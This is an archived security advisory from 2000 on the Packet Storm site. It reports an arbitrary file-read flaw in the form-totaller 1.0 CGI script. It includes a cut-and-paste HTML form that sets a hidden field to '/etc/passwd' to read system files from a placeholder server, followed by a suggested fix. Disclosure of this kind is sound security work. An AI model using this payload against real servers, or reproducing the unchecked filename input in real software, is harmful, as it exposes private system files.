what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

form-totaller.txt

form-totaller.txt
Posted Aug 14, 2000
Authored by Signal 9

Form-Totaller version 1.0 (form-totaller.cgi) trusts user input for filenames, allowing a remote user to read any file on the webserver.

tags | exploit, remote, cgi
SHA-256 | e3d777d52f8cfacde87ec258a2d6cfa48ba8b637c56c21835cdf716ee4620394

form-totaller.txt

Change Mirror Download
Content-Type: Remote Root via vulnerible CGI software
Date : 13/08/2000
Sender : s1gnal_9 <s1gnal-9@vs-solutions.com>
Subject : form-totaller Vulnerible CGI
X-System : UNIX/NT systems running the form-totaller CGI software
X-Status : s1gnal_9-ADVISORY-form-totaller.txt
X-Greets : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________


PRODUCT NAME: form-totaller version 1.0

PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/
Also Available at freecode.com

DESCRIPTION :
Use "form-totaller" to create tests and quizes on the web.
Use forms with pull-down menus or radio buttons and this CGI will display
output based on their input.

PROBLEM:
The command field "_response_data" is the field that specifies the display output
based on their input.

The default file for this field is set at:
<input type="hidden" name="_response_data" value="responses.dat">
A remote attacker could easily change the cgi script to use "/etc/passwd" as the
response data value.


EXAMPLE:
Below is a example of how we could read files on the remote system.

<-------------------------CUT HERE-------------------------------------->
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">
<input type="hidden" name="_response_top" value="top.html">
<input type="hidden" name="_response_data" value="/etc/passwd">
<input type="hidden" name="_response_bottom" value="bottom.html">
<input type="hidden" name="_divide_by" value="4">
<input type="submit" value="Click for viewing of the /etc/passwd file.">
</form>
<-------------------------CUT HERE-------------------------------------->


SOLUTION
I would recommend hard-coding the response_data file right into the script
and leave that command field out of the cgi.


Please visit www.zone.ee/unix :)

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close